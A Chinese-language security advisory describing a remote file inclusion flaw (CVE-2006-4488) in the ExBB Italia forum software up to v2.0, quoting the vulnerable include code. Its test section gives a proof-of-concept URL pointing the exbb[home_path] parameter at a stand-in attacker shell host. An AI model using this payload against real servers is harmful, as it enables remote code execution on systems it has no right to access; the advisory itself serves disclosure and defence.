发布日期：2006-08-29
更新日期：2006-08-31

受影响系统：

ExBB ExBB Italia <= v2.0

描述：

---

BUGTRAQ  ID: 19753
CVE(CAN) ID: CVE-2006-4488

ExBB Italia是一款意大利语的论坛程序。

ExBB Italia在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。

ExBB Italia的modules/userstop/userstop.php脚本没有正确验证exbb[home_path]参数的输入：

include($exbb['home_path'].'modules/userstop/data/userstop_conf.php');
include($exbb['home_path'].'modules/userstop/language/'.$exbb['default_lang'].'/lang.php')

允许攻击者通过包含本地或外部资源的任意文件执行任意代码。成功攻击要求打开了register_globals。

<*来源：SHiKaA （SHiKaA@hotmail.com）
  
  链接：http://secunia.com/advisories/21681/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://sitename.com/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://SHELLURL[.]COM?

建议：

---

厂商补丁：

ExBB
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://exbb.clans.it/

浏览次数：2891
严重程度：0（网友投票）